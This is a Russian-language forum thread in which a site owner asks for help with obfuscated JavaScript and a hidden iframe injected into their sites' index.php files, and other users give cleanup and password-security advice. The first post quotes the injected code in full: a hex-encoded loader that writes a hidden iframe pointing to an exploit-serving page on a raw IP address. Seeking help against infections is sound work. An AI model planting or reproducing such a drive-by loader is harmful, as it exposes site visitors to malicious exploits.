|
На страницу 1, 2 След. |
|
|
|
Привет!
У меня такая история, взял хостинг к которому можно прикрутить 5 доменов.
4 сайта не вордпресе, один сайт на движке, который писал один знакомый.
Короче обнаружил на всех сайтах вот такую запись
| Код: |
<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v479c9fa343af2(v479c9fa343efc){ function v479c9fa3442e5 () {return 16;} return(parseInt(v479c9fa343efc,v479c9fa3442e5()));}function v479c9fa344af0(v479c9fa344eea){ function v479c9fa345b0a () {return 2;} var v479c9fa3452fe='';for(v479c9fa3456f8=0; v479c9fa3456f8<v479c9fa344eea.length; v479c9fa3456f8+=v479c9fa345b0a()){ v479c9fa3452fe+=(String.fromCharCode(v479c9fa343af2(v479c9fa344eea.substr(v479c9fa3456f8, v479c9fa345b0a()))));}return v479c9fa3452fe;} document.write(v479c9fa344af0('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3037663863207372633D
5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3531383837292B27653437626563313466625C27207769647
4683D353833206865696768743D3839207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
|
Эта запись стоит в исходном коде в самом низу. Кто подскажет что это и как бороться.
Написал в сапорт хостинга, там сказали типа разбирайтесь сами.
пример сайта _photoles.ru могу все написать, но думаю ни к чему. |
|
|
|
|
|
да и еще, как я понял это модуль, который перенаправляет моих посетителей, точнее не перенаправляет, а накручивает моих посетителей на счетчик других сайтов. Можно как-то понять каких? Я так понимаю что какой-то сеошник кидает какого-то рекламодателе через меня. Хотел бы короче узнать кто это и    этого чувака. Если конечно он в пределах досягаемости. |
|
|
|
|
|
| реально эту дуру видит только каспер. Если у кого-то каспер, то посмотрите плиз как называется вирус |
|
|
|
|
|
В кратце:
заражает файл index.php, расположенный в корневой директории сайта, путём дописывания в его конец вредоносного? javascript кода....
Делает это предположительно в автоматическом режиме...
такой троян гремел год назад у agava.ru
заражает файлы index.php |
|
|
|
|
|
сам с собой поговорил  |
|
|
|
|
|
1) чистить свой комп, вполне вероятно, что доступ к сайту был получен трояном через ваш комп
2) после чистки домашнего компа менять пароли от хостинга (обязательно от фтп, желательно от http панели), либо поменять пароли с другого компа
3) удалить эту хрень на индексных страницах
ps менять пароли без чистки своего компа бесмысленно - появится опять. |
|
|
|
|
|
| m_Stasuk, у тебя от фтп пассы увели и ифрейм поставляли или ты сателлиты купил готовые такие? я не понял из первого поста |
|
|
|
|
|
| я не знаю как получилось. Все 5 сайтов делал я сам. Похоже что меня ломанули все же. |
|
|
|
|
|
| Ну тогда тебя или хостинг ломанули, меняй пассы, апдейти ВП, проверь свой комп. |
|
|
|
|
|
| Жека писал(а): |
1) чистить свой комп, вполне вероятно, что доступ к сайту был получен трояном через ваш комп
2) после чистки домашнего компа менять пароли от хостинга (обязательно от фтп, желательно от http панели), либо поменять пароли с другого компа
3) удалить эту хрень на индексных страницах
ps менять пароли без чистки своего компа бесмысленно - появится опять.
|
да, самое частое - это ftp-аккаунты у тебя берут, которые локально на твоем компе хранятся.. и все действия, которые жека перечислил очень ценные :)
а чем ты пользуешься для работы с ftp? интересно просто. вот в total commander'e пароли в открытом виде хранятся. поэтому их очень
легко оттуда взять и попользовать. |
|
|
|
|
|
короче этот модуль отравлял мне жизнь все это время.
сейчас нашли решение. Файлу index.php поставили атрибуты 444. Это скорее всего должно искоренить проблему. |
|
|
|
|
|
только там ничего не накручивается, там на сплойты на сплойты всё ...
а если уж антивирь ворчит, то слова мои подтверждает. по сути Жека отписал элементарно что сделать. |
|
|
|
|
|
| скорее всего у тебя пароли от фтп увели. Если так то хоть какие права поставь, переписать его всеравно можно будет. Работай над защитой своего компа |
|
|
|
|
|
то что Жека написал я делал 500 000 миллионов раз. Не помогло.
Чищу комп, меняю пароли, но через время модуль появляется опять.
Сейчас пока затишье. |
|
|
|
|
|
а.. лала.. пам пам.. тум тум..
а бывает в наших краях... лам лам пам пам...
когда даже платный хостер.. ла ла пам пам
.......... на всем своем .. машинке ... ла ла пам пам СТАВИТ НА НЕКОТОРОЕ ВРЕМЯ .. ла ла пам пам ТИПА ИФР#ЙМ какого нить троя как АДДОН РЕВРИТЕР НА ВЕСЬ ВЫВОД ХТМЛ контента с машинке..
пали что за хостер  |
|
|
|
|
|
|
